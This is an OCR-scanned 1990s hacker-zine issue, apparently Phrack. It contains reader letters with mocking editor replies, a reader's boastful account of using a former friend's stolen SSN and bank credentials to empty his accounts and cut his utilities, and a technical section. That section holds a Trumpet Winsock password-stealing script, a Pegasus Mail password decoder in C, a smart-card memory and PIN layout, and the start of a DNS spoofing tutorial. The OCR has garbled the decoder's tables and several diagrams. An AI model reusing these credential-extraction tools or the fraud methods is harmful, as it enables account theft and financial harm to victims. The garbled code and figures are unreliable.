[ AHM THE BEST!@ ] 


I have 2 files in Corel Word Perfect 7.0 that have pass words on them I 
need the Fast Can you help? Or know anyone who can? 


I’m in the U.S. 
[ Great. We’re practically neighbors then. ] 


I will pay I hear your one of the Best out there :-) 


[ AHM THE BEST!@ ] 


Melissa 


P.S.I need to try to get these by Sun. Night I can e-mail them to you? 
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[ Hrm. ‘Melissa* huh... Hrm.. You’d better bring them over, this could 
take a while. ] 


Oxlc> 


Just wondered why everyone raves about PGP, even thogh it’s breakable. 
[ What the hell are you talking about? ] 


Is it possible to by-pass ’Proxy blocks’ on an internet connection? The local 
iNet connection has blocks on all hack/warez sites whereby when you try and 
access them you get a ’You’re trying to access a filtered URL’ message. I 
figured it would be possible to re-route the conneciton but haven’t a clue 
how. 


[ Shure. Try some covert tunneling via IP fragmentation or IP-IP. ] 


Also, how do you find out all this stuff about tapping phones, cell-net 
busting and telephone, errr, dabbling?? Do you research it yourself or just 
accumulate it form others? 


[ Everything I know about phones is self-taught. ] 


Many thanks, 
Denyerec 


Oxld> 


Hi, 

I’ve been reading a-lot of phrack zines lately and seeing your name 
in most of them, I thought your the best to answer my questions ??? 

To become a hacker where do I start ? 


[ New Zealand. Or at least as far away from CA as possible. ] 


What books should I read ? 


[ Anything by Stevens/Knuth or any of the millions of smarter-then-you peopl 
out there. It’s a safe bet that, if they wrote a book, they’re smarter then 
you. Very safe bet. Like, Fort Knox safe. ] 

What languages do I have to learn ? 


[ English is a good start. ] 


Which sites are the best to go to for information on hacking 
(including newsgroups) ? 


[ Anything in the alt.* hierarchy is a good plan. It’s ALL *choice* 
material. ] 


I’ve only started hacking and that’s into applications on my 
computer and my friends computers. 


[ That’s nice. ] 
I hope I’m not bothering you with this message. 


[ No bother at all. I’m shure you’ve made someone smile, somewhere. ] 


Oxle> 


Dear Phrack, 

I’m looking for a phreak to work in France and I couldn’t find such 
informations on the Net; so, is there any chance that blue box may work in 
France, or the Phoney app which comprise red, bleu, green, and black boxes, 
and if so it is, how does it work ? 
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Also, there is any site on the Net where I can find informations and tools 
for phreak in France? 


Thank you so lot by advance for your advices. 


[ Now, I don’t know any French people, but, I think if I met some, they 


would like me. I don’t give into all that ‘French people suck* propaganda. 
Nono. I think they rock. And the French women are really pretty, too. ] 
Oxlf> 


I use a macintosh when I ip spoof. Please, if you use a macintosh, send 
me a hacked version of TCP/IP an/or a hacked version of Open Transport. 
thanks. 


[ You’re neat. Let’s be pen-pals. ] 


0x20> 


Hello! 


Sorry for borring you, but I’ve some problems with L2 on FreeBSD-2.2.1R 
and decide to ask you about some tech details. 


The problem is that ’loki’ unable to receive ICMP_ECHO packets from 
‘lokid’. I dig through kernel netinet sources and AFAIK, there is no way 
to pass ICMP_ECHO packets to userland. In ip_icmp.c we have: 


ICMP_ECHO->icmp_input () ->icmp_reflect () ->ICMP_ECHO_REPLY->icmp_send () ->net 


So, there is no chance to receive ICMP_ECHO in application program, isn’t 
it?! Unfortunately, I’ve no access to Linux box, so I can see what’s 
hapen there. 


[ You are correct. In the accopmanying paper I allude to this problem. Net/3 
based stacks will not pass ICMP request packets to userland. ] 


Is there are any workarounds? I can patch my kernel, but I think this is 
not right way. What do you think about this? 


[ Running the client and daemon on Net/3 boxes is a problem. ] 
p.s. The idea of patch is simple - create copy of packet’s mbuf via 


m_copy(), send it to rip_output() and only after that pass original packet 
to icmp_reflect(). 


[ Cool! Write the patch up and I’11 publish it in a future issue. ] 
Regards, Roman. 


Ox21> 


I would like to put a request out for all so called "hackers" to join up i 
can’t find nobody to talk to in this Hellhole Richmond, Virginia I want to put 
a message up for all VA area code 804 hackers that live near richmond to 
email me at DrMischief@juno.com . Thanx 


Thanx, 
Mischief 


ALIAS: DrMischief 
[ Here’s your chance. ] 


Ox22> 


Let me start by saying your magazine is great. I read it whenever I have 
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time. I am a newbie and want to know if you know anyone who could help me 
get started who lives/operates in the Morris County, NJ area. 


“The Gator 


P.S. If you know anyone using the handle ’The Gator’, can you please tell 
me so I don’t offend anyone. 


[ You mean you haven’t checked in the official codename repository? Oh boy. 


I don’t envy you. ‘The Gator* is one of the most sought after nicks in the 
history of nicks! You’re in for it now. God help you. ] 

0x23> 

Hello! 


Thanks for such a good e-zine. It has a lot of relevant articles, 
and it helped me start hacking. Again. thanks for that. 

I was wondering one thing, however: do you know onything about the 
Mentor? He wrote the Hacker MAnifesto, and I believe he wrote an article for 
phrack once...... Could you give me any help, please? I’m dong this for a 
school project.... 


[ I hear the mentor joined a new wave band and changed his name to Bobbysox. ] 


O0x24> 


Where can I find a sshd.c trojan? 


[ http://www.cs.hut.fi/ssh/#current-version ] 


Ox25> 

I’d like to know if someone of you ever made some compiling in 
C (I’d like something for you) thank’s 

{ Huh? ] 

Ox26> 


Hi, I need a FALSE IP APP: Can You Help ME? 


[ NO I can’t HELP you AT all. ] 
y 


Ox27> 


I heard about Phrack magaine issue talks about hijacking sessions, which 
one is that issues? I can’t find it. 


[ P50-06 ] 


Ox28> 


I’m trying to reach all the real hackers and phreaks (not stupid warez 
lamers) in the 601 area code, especially those around Lauderdale county, 
so I figured Phrack would be a good place to start. 


A few friends and I are gonna be starting some get-togethers at the new 
Bonita Lakes Mall in Meridian when it opens up later this October 
(probably long past by the time the issue of Phrack this will be in 
comes out). 


All fellow readers interested in reviving the HP scene in the East 
Mississippi-West Alabama area are welcome to come (reviving assumes that 
there was ever a scene here in the first place. We’re quite boring 
hicks in this part of the country). 


If you’re planning on coming, or want more info, please E-Mail me at 
weaselsoftware@hotmail.com 
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Even if we just have the locals, we should have a lot of fun, so if all 
goes well, I just might be writing an article for Phrack about it, if 
ya'll would be interested. 


[ We would’nt be. Ya’ll. ] 


Cheers, 
-|/|/easel 


Ox29> 
I’v have a few questions about Juggernaut: 
1) can it capture ethernet packet ? 

[ It can capture many. ] 

2) can it act like sniffer ? 

[ Shure. ] 

3) which compiler 

[ GNU C compiler ] 

4) does it have to run on root 

[ No, it has to run as root. ] 

5) which plateform does it work on? 


[ Linux (legacy version) Linux, BSD, Solaris (current unreleased version) ] 


Ox2a> 


You could say I’m a newbie or novice. I would be very greatful if you 
could send info on anything on beginning hacking. Like what computers are 
the best and what additional accessories you need. So in short please send 
any info you could. Thanks. 


[ WHAT AM I DOING? I AM PUBLISHING PHRACK. WHAT IS PHRACK ABOUT? PHRACK 
IS ABOUT DISSEMINATING ENTROPIC INFORMATION TO ANYONE WHO WANTS IT. ARE 
YOU CONFUSED? IT WOULD APPEAR SO. ] 

Ox2b> 

I have heard about your magazine. I am not new but I am not experienced 

to this side. Would you please guide me to where I would begin. 

pool 

[ P51-02@0x2a | 

Ox2c> 

Kong-ratz Guyz! You made it onto C|NET Last night at 10 on (Sept) the 5th. 

They were bashing you! Damn..... Well thats it. C-ya! 

[ Hrm. ] 

Ox2d> 

After reading Phrack for years and being in the computer industry for 

18+ years, I thought it was time that I write in. I have been reading Phrack 

for about 6 years now. Even talked to Erik Bloodaxe a few times in 

regards to Banyan Vines a couple of years ago when I was in the military. 

The scene seems to have changed so much now. It used to be full 


disclosure for the most part. Now everyone is so paranoid of sharing what 
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they know, since everyone will rush a patch out for the latest exploit. 
How do you think others learned? Hacking is and always will be about 
exploring the limits of systems and networks. As you learn and share, 
others can expand their knowledge base. I started back on Atari 400s 
years ago coding in BASIC. I know many will laugh at that very thought, 
but it was a start. The groups back then were very tight, but also 
willing to help each other. If you showed a willingness to learn, and 
took the time to learn, instead of just leeching, it was amazing what 
others would do to help you. 


I have been digging through tons of sites lately, most are outdated hacks 
from what I have seen. Most places patch as fast something hits the ‘Net. 
But at least you can learn from the code if you take the time. I want to 
sends congrats out to Phrack. You guys along with a handful of others make it 
a point to keep sending things out to us in the community. One of the 
comments I am sure to hear is, then why don’t you contribute things? I have 
not to Phrack directly, but that will change soon. I don’t have a lot that is 
that great, that hasn’t been patched for already. Mine is more tinkering and 
learning. Anyway, I am sure I have rambled enough for now. Just thought I 
would give my $.02 worth. Keep up the good work at Phrack! 


L8R, 


D-Man 


Ox2e> 


I am looking for a REALLY good telenet software and an also REALLY good 

[ I like the telnet software that comes with 4.4BSD. ] 

scanner software. Can you refer me anywhere? 

[ Scanners was a terrifiing movie! Why would you want to scan someone?!@ ] 


I also would like to know how you decode the password in the passwd 
file. 
For example it writes: 


john: x :9999 :13: John Johnson:/home/dir/john:/bin/john 
[ ‘x’ is a shadow password token. It cannot be decrypted. Futhermore: 

Unix passwd encryption is based on a modified version of DES. The user 
enters her login and password at the prompts. The user entered password is 
used as a key to encrypt a 64-bit block of NULLs. The first seven bits of 
each character are extracted to form a 56-bit key. (The other eight are 
used for parity.) This implies that only eight characters are significant to 
a password. The E-table is then modified using the salt, which is a 12-bit 
value, coerced into the first two chars of the stored passwd. The salt’s 
purpose is to make precompiled passwd lists and DES hardware chips 


ineffectual (or more difficult to use). Then, DES is invoked for 25 
iterations on the block of zeros. The output is 64-bits long, and is then 
coerced into a 64 character alphabet (0-9, A-Z, a-z, ".", "/"). This 


involves translations in which several different values are represented by 
the same character. Unix passwd crypts are the product of a one-way hash. 
Information about the key is dropped in every iteration. Bits are LOST in 
the process. crypt(3), therefore, CANNOT be decrypted, reversed, or 
otherwise subverted from any type of scrutiny of it’s output. ] 


Ox2f> 


To the Editor: 


I have to give out props to the job done on Phrack5l..... it just keeps 
getting better and better. Iv’e enjoyed Phrack 1-50 but i must say that since 
the current staff of the mag took over iv’e really noticed a marked 
improvement in the qaulity and content of the articles. Thanx for making this 
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magazine available to all of us out here who are reading and learning But just 


NMEwithin 


[ http://www.infonexus.com/~ daemon9/PIX/milla4.jpg ] 


0x30> 


a story of adolencent revenge..by a not so adolencent at 3:37 am 


[ Be warned. This is long. ] 


So here i sit surrounded by an ashtray full of butts, empty beer cans, empty 2 
liters, a giant pile of papers, a stack of cd’s, dirty dishes, tangled cords, 
red and green lights, the ticking of the furnace and blurred vision. Just got 
back from the pool hall and pissed off. why? because an old friend is getting 
married tomorrow and I was not invited. Well WAS a friend is more to the point. 
Betrayal in any form is a great primer for hatred. I am a twenty something 
(hate that fucking phrase) loser with no clue on what the future holds..but I 
find pleasure in figurative masterbation with MY processor. Match wits with 
this bitch, tell IT what to do and make it my slave...cheap thrill. Having 
power over something or someone is great while it lasts..as long as you do not 
have a concience. But I was wronged, so it is justified..my actions I mean... 
right? My girlfriend is asleep upstairs and thinks I sit up a nights doddeling 
to porn sights. I tell her that my pce is not working right, so that is why I am 


always working on it...that fucker bill gates. If he was a smart as the world 
beleives he is, these activities would not be so easy. Back to the point. 
(sorry! had a few too many). So I sign on...search for allies, find them among 


other assholes that have somehow learned one of my handles. My buddies are up 
to some funny shit, not total anarchy, but funny none the less. So what do I 
do...I tell them that I am in a bad state of being at the moment..they ask why, 
"Time for pain!" is what I read. You know how it is. A friend since first 
grade on through college just fucked you for the 100th time. I feel sick about 
it, but none the less it’s time to put to work the tricks of the trade. I give 
my TRUE friends the skinny on my intentions, they ablige with laughter and 
frothing mouths. I cough up his SS#, home, phone, bank, work, license, and 
online accounts. Too late to turn back now. It’s funny how one will actually 
take the gas pipe for virtual strangers that one has formed an online bond 
with, and will enlist them in a sceme to fuck a real time friend. (ex-friend). 
Number one, divide up the tasks. Number two, failure is NOT an option. N!umber 
three, ruin wedding. So here we go...secretary of state was a blow off, no 
brainer. PhoneCo a bit tougher (but been there before). Bank..oh the bank.. 
online banking 24/7 was such a good idea. My collective cohorts and I were 
like pitbulls fighting over the neighbors cat. Giggeling like schoolgirls. HI 
we are elite! or so we think..most of our shit (not all) was built by others 
before us. We did modify code, but the backbone was not our own. Now it is 
4:30 am and the shit is flying...after reading the "underground" being a 
martyr seems cool. My head is spinning, but I have to remain focused at all 
times..it is hard. Account activity...money is due to the banquet facility 
tomorrow. At least the balance of the shindig after the initial deposit. Check 
numbers and cleared transactions. He has no fucking clue! The best part was 
that he had mentioned writing a check for his balance only one day before.... 
but the amount owed was not cleared yet on his account. So time to insert! 
--0.00 balance. Too easy. OK, fine. Just a bounced check to deal with. Phones 
turned off (schedualed termination for lack of response to notices sent). Oh 
yeah..did I mention Utilities? Bank takes care of payment...how convenient. 
Car payments, insurance, mortgage the whole nine. Zip, Zero, Zed. A repeater. 
Constant (0.00). I am an asshole, I know, but being fucked by a ’/FRIEND" is 
troubeling and unforgivable in this situation. One more thing..Company Voice 
mail...fucked. Left a text to speech recording to boss, too funny and 
implicating to dillhole. It’s like giving beavis and butthead a small piece of 
gray matter that works for only bad things. I should of been invited to this 
wedding, but never the less, he is marrying a whore. This may sound vindictive 
or like sour grapes, but totally true. So actaully we are doing him a service, 
he just does not know it. The "ruin the wedding" part is actually out. It will 
happen and the avalanche of our actions will not start until the following 
week. But at least i did something, right? What a stupid thing to concentrate 


GI 
re 
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on. I am an idiot with things I should not have. Most of my collective friends 
are striking political targets...I am bouncing a check. But I am over it now. 
Time to sit back and wait...wait for the phone call from a mutual friend to 
give me the dirt. I guess I am the type of guy that would get a boner if I 
reset his sprinkler timer to go off when he is trying to get in his car. 
Totally retarded, but I would laugh for days. Whats wrong with me? I am now 
sitting here in my self-made dungeon scratching my head saying to myself "boy 
that was way harsh". I know some people would pose the question, "what did he 
do to desrve this type of retaliation?". You know what it’s like, you have 
been there at one time, and everyone reaches a point where counter measures 
are warranted. Case closed. What we did was but an inconvenience, but will be 
remedied. Nothing was left beyond repair. It’s at these times! (no matter how 
trivial) you find out who is willing to take a bullet for you. And in some 
fucked up way, that is important. At least it is to me. it’s 7:49 am and time 
for the sandman. 


SychoSis The Collectiv 


[ I am not sure which saddens me more, the fact that you actually spent several 
hours writing this, or the fact that I spent several minutes reading it. Now 
Phrack’s loyal readers can feel my pain and read this for themselves. ] 


Ox31> 


To whom it may concern: 


I believe that I submitted an article to your publication on hacking the 
phones at your local WAL”MART, please be advised that I submitted the 
same article to 2600 magazine and blacklisted 411, however I submitted 
the article to 2600 magazine before yours or blacklisted, they hav 
d 
t 


ecided to publish my article, and there fore I wish to inform you of 
his so there is no confusion. 


Thank you for your attention, 


Pirho 
Brought to you by Pirho and the International Brother Hood Of Frat 
Houses. 


[ We can only hope that your article brings Emmanuel and the rest of the 2600 
editorial team as much amusement as it brought us. Not from going and 
harassing people at Walmart, no. Mostly from laughing at you for writing 
it. We’ll leave the articles on hacking things like Walmart and Disney 
World for publication by 2600. We like to think we still have a reputation 
for quality. -alhambra ] 


0x32> 


Dear..sir 

I had readed yours doc.I’m interesting 
about hacking art and learing it.I would like 
to ask you.How can I hack my ISP?It’s dumbing 
I know.But I don’t know to ask anybody. 


[ I wonder if the alephlspeak to English translator has a ‘Yoda setting’... ] 


0x33> 


Hey, I just finished a two hour picture tour at your webpage, looked at 
every single photo on that hosted there, I know for one thing, with all the 
film you have used, Kodak must love you! The pic’s were a riot, matter of 
fact, I almost had an accident in my pants I was laughing so hard. Seam’s 


[ Maybe you should get some rubber pants or those adult diapers. ] 


like you and your friends know how to have fun (my kind of people) all we 
have up here is half-wit clowns. Anyway, enuf with the bullsh*t, 
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I just wanted to ask you who owns "INN", if it is you, how did you pay for 
all that hardware? Where are you located, Cali I assume? How old are you? 
Any chance of meeting somewhere to chat one day (IRC)? 

If it’s to personal, I understand, if not, reply... 


[ Are you coming on to me? ] 


Regards -Tyrant 


Ox34> 
[ ...Regarding the '’/Teardrop’ IP fragmentation bug... ] 
Dear To whom it concearns, 

I do not think you should have posted this about your bug you found. 


Alot of maniacs got a hold of it and are crashing servers everywhere. Th 
net has turned into anarchy. I have about 4 servers down that i patched. But 


[ The Internet is anarchistic by nature. ] 

the patch doesnt seem to work. 

[ The patch works fine. Perhaps it is you that is broken? ] 

I do not think you should have posted that publically like that. 


[ Thanks. I’11 make sure to file your opinion in the ignorance-folder. ] 


0x35> 


I’m just wondering when is defcon and where can I find out about little 
bit more? 

Regards. 

Pav. 


[ Defcon is traditionally held during the Summer in Sin City. Damn I love 
that town. http://www.defcon.org for more info, although the future of 
this Con is in question. ] 


0x36> 


Where can I find ways to make Long Distance phone calls without getting 
billed (and prefferably without making any boxes?) 


[ A phone line for which you do not pay the bill. ] 
I’m not an idiot, I just thought I’d ask. :) 
[ Is that open to conjecture? ] 


O0x37> 


To Whom It May Concern: 


I enjoy reading your stuff in Phrack and I pay attention to those stuff 
that is writen about unix reading stuff. I am just wonder if there is any way 
to play tricks or hack linux 1.2.13. It also runs pine under it and I think 
there is a trick with .rhosts in pine and ls /tmp. Could you please tell me 
more stuff about this?? I could download the /etc/passwd file but then I have 
to use a dictionary to hack it and is there away of hacking it without using a 
dictionary?? And how do I delete my last login file?? Thanks!! 


Your Truly 


Tag 
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[ Linux 1.2.13 is one of most inpenetrable versions of Unix out there today. 
Not only is the Linux O/S reknown for its stalwart and inpenetrable security 
but the 1.2.13 kernel was where Alan, Eric, Linus and the rest of crew 
peaked. That kernel revision is all-but immune to every known form of 
attack (with the possible exeception of quantum state disassembly). Your 
best bet is to kill yourself now. ] 


0x38> 


How ye all doin there at Phrack, hope your all keepin well. 


Anyways before I say anything I’ll admit it, I’m a newbie, not a lamer a 
newbie. I’ve read all the hacking files I can get my hands on. There’s only 
one small problem...I live in Ireland. A few weeks ago I was given an article 
written by "Hackwind" (1992 I think) about the hacking scene in Ireland. 
Believe you me. It’s even worse than he says it is. The main problem is that 
all the files written don’t relate to Ireland in any way . I don’t even know 
ONE bbs in Ireland and NO ONE I have spoken to does either. I don’t expect you 
to know much about the hacking scene in Ireland but if you do know anything, 
anything at all could you please send it to me. I’m dying for information. 
Information that I can’t get my hands on. If you don’t know anything about it 
perhaps you know of some contacts. 

Please let me know. Cheers, 


NO_eCHO 
PS. Keep up the good work at Phrack. 
[ Ok, someone in Ireland help this guy out. ] 


0x39> 


hello my name is FUSION from a group called digital elite alliance and i 
was wondering if you would like to become allies with us. If so e-mail me back 
at XXXX@prodigy.net and then i’ll get back to you. 


[ Don’t hold your breath. Wait. On second thought, do. ] 


Ox3a> 


Daemon9, 

Hi! I’d like to ask you a very common question. Maybe everyday you have 
received mails asking it. Yes, what I want to know is how to become a great 
hacker. 


[ Swing from the shoulders, not from the arms. ] 


I am a freshman in university. I wanna to be a hacker, not for doing 
damage to others, but in my own view, being hacker require a lot of 
knowledge and creative. I aim at knowledge and want to find out new tech, 
while not just using others’. In fact, I have read many articles about how 
to become a hacker. And I have done them. 

Now, I have mastered C, unix shell, and some of TCP/IP. 
So what should I going to learn if I want to be a great hacker like you? 


[ If you have mastered the aforementioned topics, you are far greater then I. ] 


I am learing socket programming and IP-spoofing now, do you have any resource 
on the net to recommend to me? 
Please write me back. Hoping to hear from you soon. 


Liu Jiangyi 


Daemon9g, 
Hi, I forgot to ask you another question. Should I join a hacker group? 
And have you joined it? If so, please tell me which group I should join. 
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And the mailing list, which one should a hacker join in your own view. 
Hoping to hear from you soon! 


Liu Jiangyi 


Ox3b> 


[ A few letters to nirva and I. I swear to GOD these aren’t made up. I 
*couldn’t* make stuff like this up. ] 


Hey Route, 


I was wondering if you knew what colours Nirva dyed his hair for 
defcon and who made the dye, I was also wondering if you had a copy 
of LISP lying around somewhere. Are you going to the KMFDM concert 
this friday by any chance? I was wondering if you have ever been bust 
for hacking or phreaking and how you manage to hack with the constant 
surveillance by the man? Also if you don’t mind telling me, how did 
you get into hacking and did you have a mentor at any stage? 


Ciao and thankx 


Hey Nirva, 


I was wondering how you got Real Kitty to drink coke out of those 
bottles from McDonalds (or is he just chewing on the straw). I was 
also wondering who Mike is currently going out with, not to mention 
you as well? If you could do me a favour and try to convince Mike to 
give me some webspace as well, I would really appreciate it. 


Thankx and Ciao 


Hey Mike, 


How would you like to win a date win with carmen electra, if you 
would like to, go on over to durex.com and there’s a link from there 
to the american site with the entry form to win the date, and being 
such a brilliant hacker I don’t see how you couldn’t manage to rig 
the contest ;) 


Thankx and Ciao 


Ox3c> 


Arggh , think of me what you will, but i Can’t get over a pic on yer 
site of nirva, prolly one of the 133t3st looking individuals i’ve seen, 
in personal appearance (no, i aint gay), but anyway .. what are those 
things on his arms ? I saw that photo with the caption "nirva has 
rickets" or something, but are they implants ? ie part of his 
image/appearance or where they sum sort of weird disease he picked up ? 


[ Due to the vitaman-D embargo of 1975 - 1978 in New Mexico, nirva contracted 
the rare disease osteomalacia (rickets). He has it mostly licked these 
days thanks to heavy amounts of vitamn-D laced EMF radition treatment he 
undergoes 2 times a week. Every now and then, however, he lapses, as you 


can see from the aforementioned picture. ] 
tah man .. great page btw 
speaxx 


Ox3d> 


EOF 
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Saplsss [ Various 


Upon discovering Doctor Jeep’s "Trumpet Winsock Password Hacker" in P51-03, I 
felt obligated to share a small piece of code that I don’t like to admit 

that I created, far earlier than th steemed Jeep’s published work. As his 
requires access to a Pascal compiler and does not seem to be coded with 
portability in mind, the fact that my script requires Trumpet itself to run 
does not seem too great a hindrance. The irony is that not only is the 
"Cipher" a simple obfuscating XOR, but that Trumpet itself will decode it 

for you. 


<++> password.cmd 
Put in Trumpet Winsock directory, run under "Dialer/Other" 
Cannot currently use any file other than trumpwsk.ini, 


apparently due to implementation errors in the "load" function 
display \n 
display "Trumpet Password Thief 1.0, 8-18-95"\n 
display \n 
if [load Susername] 
display "username: " 
display Susername\n 
else 
display "ERR: cannot load username"\n 
end 
if [load Spassword] 
display "password: " 
display $password\n 
else 
display "ERR: cannot load password"\n 
end 
display \n 
<--> 
— anonymous 
Ox2> 
Another password decoder for ya... written long ago, I just never bothered to 


release it... 


<++> peg-dec.c 

/* 
* Pegasus Mail Password Decoder vl.0 by Belgorath 
at 


#include <stdio.h> 


/* Decoding/Encoding Tables */ 


int decl[1l]= 44 }; 

int dec2[2]= LG: 2d 

int dec3[3]= LO g DZ pr 28s ah 

int dec4[4]= { 37, 28, 21, 7 }; 

int dec5[5]= 21, 22,7 31; 28, 9 4 

int dec6[6]= 22, 13? 28; U4, Ly 2s, Kj 

int dec7[7]= { 15, 17, 21, 31, 0, 12, 19 }; 

int dec8[8]= Oe F25. thy. 82:04 “G4, 22,--28;. 230% 

int *decz[8] = { decl,dec2,dec3,dec4,dec5,dec6,dec7,dec8 }; 
int decode_char(int numch, int ch, int pos) 
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ch-=decz[numch-1] [pos-1]; 
if (ch<-127) cht+=256; 
return ch; 

} 

void main(void) 

{ 
Int ZZ 3, ne; 
char *tz; 
int inps[20]; 


nc=0; 
tz=malloc (8192); 
printf ("Enter Pegasus Mail Password: "); 
gets (tz); 
/* Fun input parsing loop. Hope your malloc bzero’s... */ 


while( *tz ) { 
for (x=0;x<strlen(tz)+2;xt++) { 
) Ii 


iF iC Gez. [SR pSSt5 7 (tz[x]==0) ) { 
tz[x]=0; 
inps[nc]=atoi (tz); 
nctt+; 
tzt=xt1; 
break; 


} 


/* Throw away anything past the end */ 
for (x=0;x<nc;xt++) if (inps[x]==-1) nc=x+1; 


/* Bll pegasus passwords end in -1 */ 


if(inps[nc-1]!=-1) { 
printf ("Invalid Pegasus Mail Password.\n"); 
return; 


} 


/* But we throw it away anyway */ 
nc--; 


printf ("Decoded Password: ["); 
for (x=1;x<nc+1;x++) putchar (decode_char (nc, inps[x-1],x)); 
printf("]\n"); 

} 


<=> 


Ox3> 


Siemens Chip Card Technology 


by Yggdrasil 


Chip cards differ from one another in memory size, type of memory (PROM or 
EPROM), security logic and micro-controller. This article will discuss the 
Siemens SLE4404 chip card technology. 


5 


The SLE4404 is employed for electronic purse cards and bank transactions, 
cellular telephony (pre-payed cards), user IDs for access control, etc. (some 
examples: SmartCard, ViaCard and Italian Bancomat). Its data can be accessed 
through a simple TTL serial channel, providing a +5 Vcc power supply from an 
external source. 


Inside the chip 


The chipcard has at its disposal EEPROM memory consisting of a 416-bit matrix 
(each row is 16-bits) that is protected by security logic providing access 
control. 


This is the logic diagram: 


Address Counter --> Column Decoder 

i. | | 16 

| Vv Vv 
C3; C8, C265. ==> Control & Row User mem 208 bit 
Cl (Vcc) --> Security Decoder > Sec unit 192 bit 
C7 (1/0) <--> Logic 26 Special mem unit 


The SLE4404 memory is subdivided in three main memory blocks: one is read 
only (a "PROM" containing the manufacturer code and/or a serial number and 
an expiration date), the second is both readable and writeabl (user memory) 
and the last block cannot be written to unless the lock-out fuse has been 
fused. 


This is the memory map: 

BLOCK TYPE SIZE (BIT) ADDRESS READABLE WRITEABLE ERASEABLE 
Manufacturer code 16 0-15 Yes No No 
Application ROM 48 16-63 Yes No No 
User code 16 64-79 [fuse] Ue. WE 
Error counter 4 80-83 Yes Yes U.C 
EEPROM #1 12 84-95 Yes Yes U.C 
EEPROM #2 16 96-111 Yes Wa U.C 
Frame memory block 
- F.M. config 2 112-113 Yes Yes UC. / Rae 
- Frame memory 206 114-319 [cfg] [cfg] Us. /RiC, 
Frame code 32 320-351 [fuse] [fuse] [cfg] 
Frame counter 64 352-415 Yes Yes [cfg] 


Meaning of abbreviations: 


Uses User code required 

(each time the code is entered th rror counter is decreased) 
Roc; -— Frame code required 

(each time the code is entered the frame counter is decreased) 
[fuse] - Operation allowed ONLY IF lock-out fuse is not fused 
[cfg] - Operation allowed according to frame memory configuration 


Frame memory configuration table: 


BIT 112 BIT 113 MEMORY MODE READABLE WRITEABLE 
0 0 Secret ROM Yes No 
0 1 R.O.M. Yes No 
1 0 Secret PROM UeCx Ue 
Ai 1 P.R.O.M. UiCe UNC: 
The first 16-bit block is for the Manufacturer Code. The following 48-bit 


block is called Application ROM, containing another code (Manufacturer sub 
code or info, serial number, sub-type of card, etc). 


The User Code is the access code (PIN) used to read/write/erase memory. 
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4 
while the 


error counter value can be modified even if the fuse was fused... 


Please note that access to memory is blocked after four incorrect access 


trials 


Frame [error] Counter 


(checked by the counter). 
(note that the number of incorrect accesses is limited 


The same is for the Frame Code and the 


to three trials instead of four). 


Finally, 
information or the credit limit 


the Frame Memory is generally used for storing personal user 


(money that can be fetched in a bank 


transaction, 


or the remaining "virtual 


"credit that a pre-payed cellular card 


contains). 


The Pin-out 


This is the Siemens SLE4404 pin-out (N.C. stands for Not Connected): 
Cl CG, Contact Pin Info 
1 6 Vec +5V 
C 2 C6 2 i) Reset 
3 4 Clock 
4 3 Test input - N.C. 
G3 CG 7 5 8 Ground 
6 7 N.C. 
7 1 Bi-directional I/O data line 
Cc 4 C8 8 2 Control input (data change) 
"IT am for ever walking upon these shores, 
betwixt the sand and the foam. 
The high tide will erase my foot-prints, 
and the wind will blow away the foam. 
But the sea and the shore will remain 
For ever." 
-- Gibran K. Gibran 
Ox4> 
/ \ | = \ | o\ / | 
a rn | I \ I | \_/ | 
ft Gg —— th] | ae cone | | V7 | 
.oO THE i Saat -3] | vi | | | | CreW Oo.. 
viree viree rprvvregsr vray rreye 
presents 
DNS ID Hacking 
--[1]-- DNS ID Hacking Presentation 
You might be wondering what DNS ID Hacking (or Spoofing) is all about. DNS ID 
Hacking isn’t a usual way of hacking/spoofing such jizz or any-erect. This 
method is based on a vulnerability on DNS Protocol. More brutal, the DNS ID 


hack/spoof is very efficient and very strong as there is no generation of DNS 
daemons that escapes from it (even WinNT!). 


—-[1.1]-- DNS Protocol mechanism explanation 
In the first step, you must know how the DNS works. I will 


most important facts of this protocol. In order to do that, 
the way of a DNS request packet from A to Z! 


only explain the 
we will follow 


Name resolution example: 


The client (bla.bibi.com) sends a request of resolution of the domain 
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"www.heike.com". To resolve the name, bla.bibi.com uses "dns.bibi.com" for 
DNS. Let’s take a look at the following picture.. 
/ \ 
| 111.1.2.123 = bla.bibi.com 
| 111.1.2.222 = dns.bibi.com 
| format: 
| IP_ADDR:PORT->IP_ADDR:PORT 
| ex: 
| PET CL 2 AA 3 29 99 => en D2 DAD 53 
\ / 
gethosbyname ("www.heike.com") ; 
[bla.bibi.com] [dns.bibi.com] 
111.1.2.123:1999 ---> [?www.heike.com] ------ > 2112 2.222553 


Here we see our resolution name request from source port 1999 which is asking 
to DNS on port 53 (note: DNS is always on port 53). Now that dns.bibi.com has 
received the resolution request from bla.bibi.com, dns.bibi.com will have to 
resolve the nam 


[dns.bibi.com] [ns.internic.net] 
PAA th 23222253 ---=----= > [dns?www.heike.com] ----> 198.41.0.4:53 


dns.bibi.com asks ns.internic.net who the root name server for the address 

of www.heike.com is, and if it doesn’t have it and sends the request to a name 
server which has authority on ’.com’ domains (note: we send a request to the 
Internic because it could have this request in its cache). 


[ns.internic.net] [ns.bibi.com] 
1:98 ..41.0-4253: SsasHH > [ns for.com is 144.44.44.4] ------ STP 2 2228 53 


Here we can see that ns.internic.net answered to ns.bibi.com (which is the DNS 
that has authority over the domain bibi.com), that the name server of for.com 
has the IP 144.44.44.4 (let’s call it ns.for.com). Now our ns.bibi.com will 
ask to ns.for.com for the address of www.heike.com, but this one doesn’t have 
it and will forward the request to the DNS of heike.com which has authority 
for heike.com. 


ns.bibi.com] [ns.for.com] 
P19. 90.02.:222:353. -—=-=-> > [?www.heike.com] -—---- > 144.44.44.4:53 


The answer from ns.for.com: 


ns.for.com] [ns.bibi.com] 
144.44.44.4:53 ------ >[ns for heike.com is 31.33.7.4] ---> 144.44.44.4:53 


Now that we know which IP address has authority on the domain "heike.com" 
(we’1l1 call it ns.heike.com), we ask it what’s the IP of the machine 
www.heike.com. 


[ns.bibi.com] [ns.heike.com] 
111.1.2.222:53 ----- > [?www.heike.com] ----> 31.33.7.4:53 


We now have our answer: 


[ns.heike.com] [ns.bibi.com] 
313.33. ¢4253> s-sSnS- > [www.heike.com == 31.33.7.44] ----> 111.1.2.222:53 


Great we have the answer, we can forward it to our client bla.bibi.com. 


[ns.bibi.com] [bla.bibi.com] 
115.0 425222253 —-=-a-= > [www.heike.com == 31.33.7.44] ----> 111.1.2.123:1999 


Now bla.bibi.com knows the IP of www.heike.com. 
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Now let’s imagine that we’d like to have the name of a machine from its IP, in 
order to do that, we proceed a bit differently as the IP will have to be 
transformed. 


